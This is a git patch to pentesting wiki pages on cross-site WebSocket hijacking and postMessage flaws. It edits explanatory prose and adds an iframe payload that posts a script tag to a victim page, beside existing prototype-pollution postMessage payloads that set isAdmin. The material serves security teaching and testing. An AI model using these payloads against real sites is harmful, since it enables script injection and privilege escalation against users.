From adb4b651ca526c2d3f3b99f9ee698215bf7165e9 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Sun, 14 Nov 2021 22:56:00 +0000
Subject: [PATCH] GitBook: [#2843] upload send postmessage

---
 pentesting-web/cross-site-websocket-hijacking-cswsh.md | 6 +++---
 pentesting-web/postmessage-vulnerabilities.md          | 3 +++
 2 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
index 52f056f20..8721cdee0 100644
--- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md
+++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
@@ -83,9 +83,7 @@ An attacker can create a **malicious web page** on their own domain which **esta
 
 ### Simple Attack
 
-Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**.&#x20;
-
-Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
+This attack allows you to make the client connect to websocket server and send some predefined value.
 
 ```markup
 <script>
@@ -102,6 +100,8 @@ function handleReply(event) {
 </script>
 ```
 
+Usually this will be useless as what you want is to get the information the real user is sending and the responses.
+
 ### Stealing data from user
 
 Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
diff --git a/pentesting-web/postmessage-vulnerabilities.md b/pentesting-web/postmessage-vulnerabilities.md
index 55cbc702c..aea1de2b1 100644
--- a/pentesting-web/postmessage-vulnerabilities.md
+++ b/pentesting-web/postmessage-vulnerabilities.md
@@ -14,6 +14,9 @@ window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 <iframe id="idframe" src="http://victim.com/"></iframe>
 document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 
+# postMessage to an iframe via onload
+<iframe src="https://victim.com/" onload="this.contentWindow.postMessage('<script>print()</script>','*')">
+
 # postMessage to an URL
 window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
 ```